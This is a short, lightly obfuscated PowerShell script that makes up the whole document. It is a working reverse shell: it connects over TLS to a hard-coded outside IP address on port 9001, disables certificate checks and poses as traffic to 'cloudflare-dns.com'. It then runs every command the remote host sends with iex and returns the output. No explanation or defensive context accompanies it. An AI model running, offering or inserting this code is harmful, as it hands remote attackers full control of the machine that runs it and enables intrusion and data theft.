${t}=[int]([convert]::ToInt32('100',16));
${c}=[Enum]::ToObject([System.Security.Authentication.SslProtocols],${t});
${d}='151.61.206.201';
${e}=9001;
${f}=New-Object Net.Sockets.TCPClient(${d},${e});${g}={return $true};
${j}=New-Object Net.Security.SslStream($f.GetStream(),$false,${g});${j}.AuthenticateAsClient('cloudflare-dns.com');
if(-not ${j}.IsEncrypted){${j}.Close();exit};${k}=New-Object IO.StreamWriter(${j});${l}='SHELL> ';
${m}=New-Object byte[] 4096;function w($o){${k}.Write($o+${l});${k}.Flush()};w '';
while(($p=${j}.Read(${m},0,4096))-gt 0){$q=[text.encoding]::UTF8.GetString(${m},0,$p);try{$r=iex $q 2>&1|Out-String}catch{$r=$_.Exception.Message};
w $r};${k}.Close();
${j}.Close();
${f}.Close()
